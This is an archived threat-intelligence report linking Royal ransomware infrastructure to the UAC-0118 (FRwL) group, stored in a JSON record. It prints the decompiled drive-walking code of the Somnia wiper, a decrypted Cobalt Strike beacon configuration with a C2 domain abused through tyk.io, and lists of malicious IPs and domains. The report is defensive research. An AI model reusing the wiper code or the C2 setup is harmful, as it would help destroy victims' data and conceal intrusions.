{ "id": "883f4f2c-5c55-40f6-a3a5-133df6fdc68c", "created_at": "2026-04-06T00:12:51.129679Z", "updated_at": "2026-04-10T13:11:33.593949Z", "deleted_at": null, "sha1_hash": "78d3f455cfc86abc0f5f2ad1346eeca512ab5f39", "title": "From Royal with Love", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 615392, "plain_text": "From Royal with Love\r\nBy Jason Reaves\r\nPublished: 2023-03-10 · Archived: 2026-04-05 19:54:32 UTC\r\nBy: Jason Reaves and Joshua Platt\r\nSummary\r\nCISA recently released a CyberSecurity advisory on the royal ransomware group. In the advisory, a number of\r\nexcellent mitigation techniques and strategies are recommended. Along with the recommendations are several\r\nIOCs and technical details on related activities.\r\nAfter reviewing several of the IOCs, one of the IPs stood out. The ip address 139[.]60.161.213. The date listed in\r\nthe CISA report is November 2022. Interestingly enough, back in November CERT-UA published an advisory on\r\nUAC-0118 aka FRwL. Similar to the report released by CISA, CERT-UA released IOC’s. They also released\r\n139[.]60.161.213.\r\nA second IOC appears to show up on both lists as well: 94.232.41[.]105. However, this IOC came with a caveat,\r\n“In reference to Cobalt Strike and other tools mentioned above, a tool repository used by Royal was identified at\r\nIP: 94.232.41[.]105 in December 2022.”1 After doing a quick search, this IP address hosted two separate cobalt\r\nstrike instances. The first instance used the domain softloadup[.]com. After a short period of time, the domain was\r\nhttps://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65\r\nPage 1 of 7\n\nrotated to sombrat[.]com. While the domains changed, the beacon watermark or license id stayed the same:\r\n“206546002”.\r\nThis watermark is not new and has been noted in multiple ransomware related events. For example, in September\r\nthe watermark showed up in a play-related ransomware attack. While the activity slightly predates the royal\r\nactivity noted by CISA, the TrendMicro article ties the watermark to previous botnets known to be deployed by\r\nCONTI related actors such as Emotet and the ransomware strain Quantum.\r\nWiper\r\nWhile investigating Somnia, we discovered a zip package named ‘Release.zip’ on VirusTotal that contained a built\r\nSomnia package(bcb2a2a247daa0e37144e00375094e6c). Somnia is written in .NET and the main code is pretty\r\nsimplistic. It simply retrieves a list of all files on the local system along with the files on any shared drives and\r\npasses each file off to the ‘CrashFile’ code:\r\nnamespace Somnia\r\n{\r\n internal class Program\r\n {\r\n public static void Main()\r\n {\r\n Program.GetLocal();\r\n Program.GetNet();\r\n }\r\n public static void GetLocal()\r\n {\r\n CrashFile crasher = new CrashFile();\r\n DriveInfo[] drives = DriveInfo.GetDrives();\r\n for (int i = 0; i \u003c drives.Length; i++)\r\n {\r\n foreach (string fname in Program.GetAllFiles(drives[i].Name))\r\n {\r\n if (!fname.Contains(\"Program Files\") \u0026\u0026\r\n!fname.Contains(\"AppData\") \u0026\u0026 !fname.Contains(\"Windows\"))\r\n {\r\n try\r\n {\r\n crasher.CrashAll(fname);\r\n }\r\n catch\r\n {\r\n }\r\n }\r\n }\r\n }\r\n }\r\nhttps://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65\r\nPage 2 of 7\n\npublic static void GetNet()\r\n {\r\n CrashFile crasher = new CrashFile();\r\n DriveInfo[] drives = DriveInfo.GetDrives();\r\n for (int i = 0; i \u003c drives.Length; i++)\r\n {\r\n DriveInfo arg_16_0 = drives[i];\r\n foreach (string fname in Program.GetAllFiles(\"\\\\\\\\\"))\r\n {\r\n if (!fname.Contains(\"Windows\") \u0026\u0026 !fname.Contains(\"Boot\") \u0026\u0026\r\n !fname.Contains(\"System Volume Information\") \u0026\u0026\r\n!fname.Contains(\"Windows Defender\") \u0026\u0026\r\n!fname.Contains(\"Windows Defender Advanced Threat Protection\"))\r\n {\r\n try\r\n {\r\n crasher.CrashAll(fname);\r\n }\r\n catch\r\n {\r\n }\r\n }\r\n }\r\n }\r\n }\r\nThe code will ignore files with certain keywords in their path:\r\nProgram Files\r\nAppData\r\nWindows\r\nBoot\r\nSystem Volume Information\r\nWindows Defender\r\nWindows Defender Advanced Threat Protection\r\nThe CrashAll functionality performs more checks to see if the file extension is in a list of extensions that are being\r\ntargeted for encryption along with ignoring files with the ‘.somnia’ extension and ignoring any file with\r\n‘image.bmp’ in the name.\r\nhttps://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65\r\nPage 3 of 7\n\nAfter passing all the previously mentioned checks, the malware will then encrypt the file by passing the path to\r\nthe ‘CrashOne’ function and then delete the original file. The CrashOne function is where we see why this\r\nmalware is not ransomware but instead is a wiper:\r\nPress enter or click to view image in full size\r\nThe main points of the above code are thus:\r\n1. Every file encrypted will use AES in CBC mode.\r\n2. Every file encrypted gets a unique AES key and IV.\r\n3. The AES key and IV used is not stored anywhere.\r\n4. The keys could be recovered from memory analysis.\r\nThe malware generates a random 32 byte AES key and a 16 byte IV for every file but does not clean up memory\r\nafterwards.\r\nCobaltStrike\r\nThe CobaltStrike instances being leveraged by this cluster of actor(s) activity appears to intersect often with the\r\nwatermark ‘206546002’. This watermark has many ties to infrastructure associated with various ransomware\r\nhttps://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65\r\nPage 4 of 7\n\noperations. DFIR Report put out two reports related to the resurgence of Emotet to deliver CobaltStrike which\r\nlook to follow the CONTI playbook during their engagement and also leading to ransomware groups suspected to\r\nbe affiliated with ex-CONTI threat actors.\r\nGet Jason Reaves’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nA blog released by SANS around the same time period as the earlier mentioned reports also links these\r\nCobaltStrike deployments to the utilization of tyk.io. The TYK API management protocol can be leveraged to hide\r\nCobaltStrike strike beacon activity, something that was mentioned previously and was also referenced by the late\r\nVitali Kremez as a tactic leveraged by ex-CONTI groups.\r\nAfter decrypting the cobalt strike file referenced in the SANS blog, the CobaltStrike sample unsurprisingly\r\nmatches the same watermark as the instances referenced earlier in the article:\r\n{\r\n 'PROTOCOL': '8',\r\n 'PORT': '443',\r\n 'SLEEPTIME': '45000',\r\n 'MAXGET': '1403644',\r\n 'ITTER': '37',\r\n 'PUBKEY': \"b'30819f300d06092a864886f70d010101050003818d0030818902818100aa7784df47a08a479b4afd8332\r\n 'DOMAINS': 'distinctive-obi-mgw.aws-euw1.cloud-ara.tyk.io,/api/v2/login',\r\n 'SPAWNTO': \"b'5b3240ca30c85bb59f6e384788df3099'\",\r\n 'SPAWNTO_X86': '%windir%\\\\syswow64\\\\dllhost.exe',\r\n 'SPAWNTO_X64': '%windir%\\\\sysnative\\\\dllhost.exe',\r\n 'C2_VERB_GET': 'GET',\r\n 'C2_VERB_POST': 'POST',\r\n 'WATERMARK': '206546002',\r\n 'INJECT_OPTIONS': 'xi1knfb/QiftN2EAhdtcyw==',\r\n 'USERAGENT': 'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko',\r\n 'SUBMITURI': '/api/v2/status',\r\n 'C2_REQUEST': '[(\\'_HEADER\\', 0, \"bytearray(b\\'Accept: text/html,application/xhtml+xml,applicatio\r\n 'C2_POSTREQ': '[(\\'_HEADER\\', 0, \"bytearray(b\\'Accept: text/html,application/xhtml+xml,applicatio\r\n}\r\nWhile ransomware strains have shifted due to various market conditions, including detainment and takedowns, the\r\nmotivation behind ransomware has typically been described as financial. However, the underground economy\r\ncontinues to evolve and innovate. As Global conditions continue to impact the Cyberspace, the overlap between\r\nFRwL and Royal operators should not be overlooked.\r\nIOCs\r\nhttps://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65\r\nPage 5 of 7\n\n139.60.161[.]213\r\n94.232.41[.]105\r\nsombrat[.com\r\nCS Watermark: 206546002\r\nBeacons:\r\ne8c806acdb51047c30ceabd419c176e3c085bb3fe009ed3e681f82ff72d05ea9 datamsupd[.com\r\nd12a59189aaaf71b7326ec0890ea3799f47f3d55ce301e6b0bab18c0b702e051 krumenx[.com\r\n2529f97f4415450fe84259c4af8951c13875a9a5e4972c6a5343fdd111fef8f0 upperdow[.com\r\nc8a309619fe10d6ab68285f748ec8b1220eeb41474eeb35fcdd285447c256a45 softupdatelive[.com\r\nc724755b643cb4625990b0f045e1e68a715675df41a82b4096421d62b1e4f657 leupdates[.com\r\n4aaddafea350512d9e63bee0fced1b67e97552e5a0649eaa2bf5708e5bb09c8a jungoupd[.com\r\n63a000ea9a943f97dbf6c472dd5c10101650db7b5c0f7c6e10782c30114bf49d jumptoupd[.com\r\n13d12091f39649493eab3cf0e56681e1ff0d8b982b85af65a0b2dd89532003a6 newstarupd[.com\r\neb2f216ee6997d1045c203d0938f1af9e2b00ab539cf0c512955d1f6f873ac7b anbush[.com\r\nd9a7e8976fcac5cdd1b221a85ed5cc683695b2d41425f76c75afd457e49d2244 newageupd[.com\r\n9e68ac920bae102ccf1829ae8b8c212cc3046dd82114966c74e740df68b76fcd thefirstupd[.com\r\n03df54639ecf97461e3570ac2f2b8b20ee9fb7845eceea34f0d6ea530544b6c4 morningupd[.com\r\n6b4808050c2a6b80fc9945acdecec07a843436ea707f63555f6557057834333e\r\ndistinctive-obi-mgw.aws-euw1.cloud-ara.tyk.io\r\nFile extension:\r\n.somnia\r\nReferences\r\n1: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a\r\n2: https://cert.gov.ua/article/2724253\r\n3: https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html\r\n4: https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/\r\n5: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\n6: https://isc.sans.edu/diary/Emotet+infection+with+Cobalt+Strike/28824\r\n7: https://shells.systems/oh-my-api-abusing-tyk-cloud-api-management-service-to-hide-your-malicious-c2-traffic/\r\n8: https://twitter.com/VK_Intel/status/1560725216455626752\r\n9: https://www.justice.gov/opa/pr/us-department-justice-disrupts-hive-ransomware-variant\r\nhttps://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65\r\nPage 6 of 7\n\nSource: https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65\r\nhttps://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65" ], "report_names": [ "from-royal-with-love-88fa05ff7f65" ], "threat_actors": [ { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "132e1e0f-8725-42cb-8c2d-d2f3ebb1f005", "created_at": "2023-12-08T02:00:05.758552Z", "updated_at": "2026-04-10T02:00:03.495698Z", "deleted_at": null, "main_name": "UAC-0118", "aliases": [ "FRwL", "FromRussiaWithLove" ], "source_name": "MISPGALAXY:UAC-0118", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "75108fc1-7f6a-450e-b024-10284f3f62bb", "created_at": "2024-11-01T02:00:52.756877Z", "updated_at": "2026-04-10T02:00:05.273746Z", "deleted_at": null, "main_name": "Play", "aliases": null, "source_name": "MITRE:Play", "tools": [ "Nltest", "AdFind", "PsExec", "Wevtutil", "Cobalt Strike", "Playcrypt", "Mimikatz" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434371, "ts_updated_at": 1775826693, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/78d3f455cfc86abc0f5f2ad1346eeca512ab5f39.pdf", "text": "https://archive.orkl.eu/78d3f455cfc86abc0f5f2ad1346eeca512ab5f39.txt", "img": "https://archive.orkl.eu/78d3f455cfc86abc0f5f2ad1346eeca512ab5f39.jpg" } }